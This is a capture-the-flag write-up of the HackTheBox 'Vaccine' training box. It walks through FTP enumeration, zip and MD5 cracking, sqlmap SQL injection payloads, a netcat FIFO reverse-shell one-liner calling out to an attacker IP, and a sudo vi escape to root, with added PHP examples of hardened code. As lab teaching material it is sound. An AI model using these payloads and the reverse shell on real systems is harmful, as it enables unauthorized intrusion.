HackTheBox | Vaccine

FarisArch
6 min read · Oct 29, 2021

If you think October is only the spooky month, well, you’re wrong! October is also known as Cyber Security Month!

To celebrate the month, HackTheBox renewed their Starting-Point, a path for beginners who want to learn hacking. And I must say it is very well made.

HackTheBox! (Literally)

The path has 3 tiers: Tier 0, Tier 1 and lastly Tier 2. What you’re going to read is a box from Tier 2 called Vaccine.

Vaccine Room rated as Easy.

Enumeration

First step is always enumeration! Enumeration is the key to victory.

NMAP

PORT   STATE SERVICE REASON  VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.31
| Logged in as ftpuser
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzC28uKxt9pqJ4fLYmq/X5t7p44L+bUFQIDeEab29kDPnKdFOa9ijB5C5APVxLaAXVYSXATPYUqjIEWU98Vvvol1zuc82+KG9KfX94pD8TaPY2MZnoi9TfSxgwmKpmiRWR4DwwMS+mNo+WBU3sjB2QjgNip2vbiHxMitKeIfDLLFYiLKhc1eBRtooZ6DJzXQOMFp5QhSbZygWqebpFcsrmFnz9QWhx4MekbUnUVPKwCunycLi1pjrsmOAekbGz3/5R3H5tFSck915iqyc8bSkBZgRwW3FDJAXFmFgHG9fX727HsXFk8MXmVRMuH1LxGjvn1q3j27bb22QzprS7t9bJciWfwgt1sl57S0Q+iFbku83NgAFxUG373nspOHn08DwMllCyeLOG3Oy3x9zcCxMGATopiPckt8lb1GCWIvLPSNHMW12OyCKGM+AmLu4q9z7zX1YOUM6oxfn3qZVLKSZJ/DJu+aifv2BVNu/zJU2wdk1vFxysmQ4roj5O5I+H9x0=
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
| 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  • Lots of information to process. Don’t worry, take your time! Time is always on our side.
  • Now let’s choose a rabbit hole to go into.

FTP

  • From the NMAP scan, we can see a line saying that anonymous FTP login is allowed.
  • That means we can log in to the File Transfer Protocol (FTP for short) server without valid credentials.
  • When logged in, we can list out the files and directories inside the server.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
  • A backup file? Let’s get that first and look around for more. If there isn’t anything else, let’s get out of this server!
  • We try to unzip the file, but it’s password protected! Crap.

John The Ripper

As hackers we always find a way to break something.

  • John The Ripper (JTR for short) ships a utility called zip2john that extracts a crackable hash from a password-protected zip file.
  • Now we need a wordlist to crack it against. We’ll be using the famous rockyou.txt.
  • After a while we get a result!

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Looks like the password was 741852963

  • Unzipping the file, we find index.php and style.css.
  • We’re more interested in the source code of index.php.
  • Looking around the source, we find PHP handling the login function of a site.
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
        $_SESSION['login'] = "true";
        header("Location: dashboard.php");
    }
}
?>

What it’s doing: if the POST username and password variables are set, it checks that the username is admin and that the MD5 hash of the password matches 2cb42f8734ea607eefed3b70af13bbd3.

  • So there is a login page on this server somewhere.
  • We could try to brute-force the password, but that’s not working smart.
  • Since we have the hash of the password it wants, we can crack it to see what the value is.
  • We’ll be using CrackStation for this, and we get it in a second.
admin:qwerty789
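
The index.php check above compares against a bare, unsalted MD5 digest, which is why a lookup service resolves it in a second. As an added example (not code from the box or from the original post), here is the same credential check written with PHP’s password_hash() and password_verify(); the user store, function names and sample password are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the index.php credential check.
// Assumptions: the user store, function names and sample password are
// constructed for illustration; a real store lives outside the web root.
declare(strict_types=1);

// Constructed sample store: username => password_hash() output.
// PASSWORD_DEFAULT is salted and deliberately slow, so a leaked value
// cannot be resolved by a precomputed-hash lookup the way bare MD5 can.
function build_store(string $user, string $password): array
{
    return [$user => password_hash($password, PASSWORD_DEFAULT)];
}

function check_login(array $store, string $user, string $password): bool
{
    // Unknown users are verified against a dummy hash so both paths
    // spend comparable time and do not reveal which usernames exist.
    static $dummy = null;
    $dummy ??= password_hash('constructed-dummy', PASSWORD_DEFAULT);
    $known = array_key_exists($user, $store);
    $ok = password_verify($password, $known ? $store[$user] : $dummy);
    return $known && $ok;
}

function handle_login(array $store, array $post): bool
{
    $user = $post['username'] ?? null;
    $pass = $post['password'] ?? null;
    if (!is_string($user) || !is_string($pass) || !check_login($store, $user, $pass)) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);   // fresh session id after authentication
        $_SESSION['login'] = "true";
    }
    return true;   // caller sends the Location header, then exit()s
}

// Constructed demo input: a wrong password, the right one, a non-string field.
$store = build_store('admin', 'correct horse battery staple');
var_dump(handle_login($store, ['username' => 'admin', 'password' => 'qwerty789']));
var_dump(handle_login($store, ['username' => 'admin', 'password' => 'correct horse battery staple']));
var_dump(handle_login($store, ['username' => ['x'], 'password' => 'y']));
```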

Web

  • Visiting the URL, we have a login page for MegaCorp.
  • Let’s use the credentials we found earlier.
  • And we’re able to login.
  • We’re presented with a table listing cars, and there is a search box.
  • Since it’s fetching the data from somewhere, is it possibly fetching from a database?
  • Let’s try a single quote in the search to see what happens.
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^

Okay so we have a possible SQL injection in our hands.
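
The error shows the search term landing inside the quoted string of the SQL text. As an added example (not the box’s dashboard.php and not from the original post), the snippet below builds that query by concatenation and then with a bound parameter; it assumes PDO with an in-memory SQLite database (pdo_sqlite) standing in for the box’s PostgreSQL backend so it runs offline, and the table rows are constructed.

```php
<?php
// Added example: the search query from the error message, built two ways.
// Assumptions: in-memory SQLite via PDO stands in for PostgreSQL; SQLite's
// LIKE is case-insensitive for ASCII, similar to ILIKE. Rows are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cars (name TEXT, type TEXT)");
$db->exec("INSERT INTO cars VALUES ('Elixir','Sports'), ('Sandy','Sedan'), ('100%_Pure','SUV')");

// Vulnerable pattern: user input is pasted into the SQL text, so a quote
// in $search changes the structure of the statement.
function search_concat(PDO $db, string $search): array
{
    $sql = "SELECT * FROM cars WHERE name LIKE '%" . $search . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the statement text is fixed and the input travels as a
// bound value. LIKE wildcards in the input are escaped to match literally.
function search_bound(PDO $db, string $search): array
{
    $escaped = strtr($search, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
    $stmt = $db->prepare("SELECT * FROM cars WHERE name LIKE :p ESCAPE '\\'");
    $stmt->execute([':p' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal term, the single quote from the test above,
// and a bare wildcard.
foreach (["san", "'", "%"] as $input) {
    try {
        $n = count(search_concat($db, $input));
        echo "concat [$input]: $n row(s)\n";
    } catch (PDOException $e) {
        echo "concat [$input]: SQL error\n";
    }
    echo "bound  [$input]: " . count(search_bound($db, $input)) . " row(s)\n";
}
```

With the box’s pg_connect() stack, the same bound form is available through pg_query_params() with a $1 placeholder and ILIKE.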

Exploit

  • We could do it manually, but it’ll take some time, so we’ll use a tool made specifically for this called sqlmap.
  • When dealing with SQL injections, I save the request using Burp Suite, which is a Man In The Middle (MITM for short) tool, and pass it to sqlmap. This reduces errors and it’s way easier.
Burp is a tool created by PortSwigger
GET /dashboard.php?search=3 HTTP/1.1
Host: 10.129.142.249
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.142.249/dashboard.php?search=2
Cookie: PHPSESSID=i8jmu9jjje1t69tjt27ouk1mu7
Upgrade-Insecure-Requests: 1

Now click save item.

  • So now we don’t have to supply any cookies or anything to SQLMAP when performing the request.

$ sqlmap -r ~/sql --batch --os-shell

  • The parameter search is indeed vulnerable to SQL injection. The DBMS in use is PostgreSQL.
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=3' AND (SELECT (CASE WHEN (4656=4656) THEN NULL ELSE CAST((CHR(86)||CHR(89)||CHR(99)||CHR(101)) AS NUMERIC) END)) IS NULL-- gQNp

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=3' AND 1330=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- FumX

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=3';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=3' AND 5698=(SELECT 5698 FROM PG_SLEEP(5))-- QKVO

By supplying --os-shell, sqlmap will give us a shell back, if it’s possible.

  • And we do get a shell but it’s very unstable.
  • Before going any further, let’s get a better shell through a reverse shell.

os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.31 9001 >/tmp/f

  • Now we have a better shell on port 9001

Post-Exploit

Now we’re in. Now what?

  • We are the user postgres, and somehow we’re in the sudo group.
  • We try to run sudo, but we need a password.
  • Always try the passwords we’ve already found in case there is any password reuse. But in this case there is not.
  • We do find a private key in .ssh, but we don’t have a password to log in with.
  • Now, when you don’t know what to do, run linpeas. Linpeas is a Linux enumeration tool.

Internal Enumeration

  • We have a few interesting findings:
/home/
/home/ftpuser/ftp/backup.zip
/home/simon/.bash_history
/root/
/var/lib/postgresql/.bash_history
/var/lib/postgresql/.psql_history
  • All the .bash_history files are empty, sadly.
  • Now, since we know there is a site, let’s check /var/www/html.
  • We haven’t checked dashboard.php, so let’s check the source code of that.
  • We find out how it’s connecting to the database to fetch data.
try {
    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}

Hard coding credentials in source code isn’t really a great idea

  • Possible credentials :

postgres:P@s5w0rd!

  • Now let’s try sudo -l again.
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • Okay, first things first: let’s SSH into the server for a more stable shell.

Privilege Escalation

  • Okay, we know that we can run sudo on /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • If you’re unaware, vi is a command line text editor.
  • One thing that people don’t realize is that you can run commands while in vi (cool huh)
  • To do this, first let’s open up the file using sudo

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Now we’re in vi mode.
  • Now hit the escape key (ESC) and we get a command bar at the bottom. It’s used for vi keybinds and all that cool stuff.
  • To run commands, first type : followed by !, then type whatever command you want! I’ll be spawning a root shell.
:!/bin/bash
  • And we should be root now!
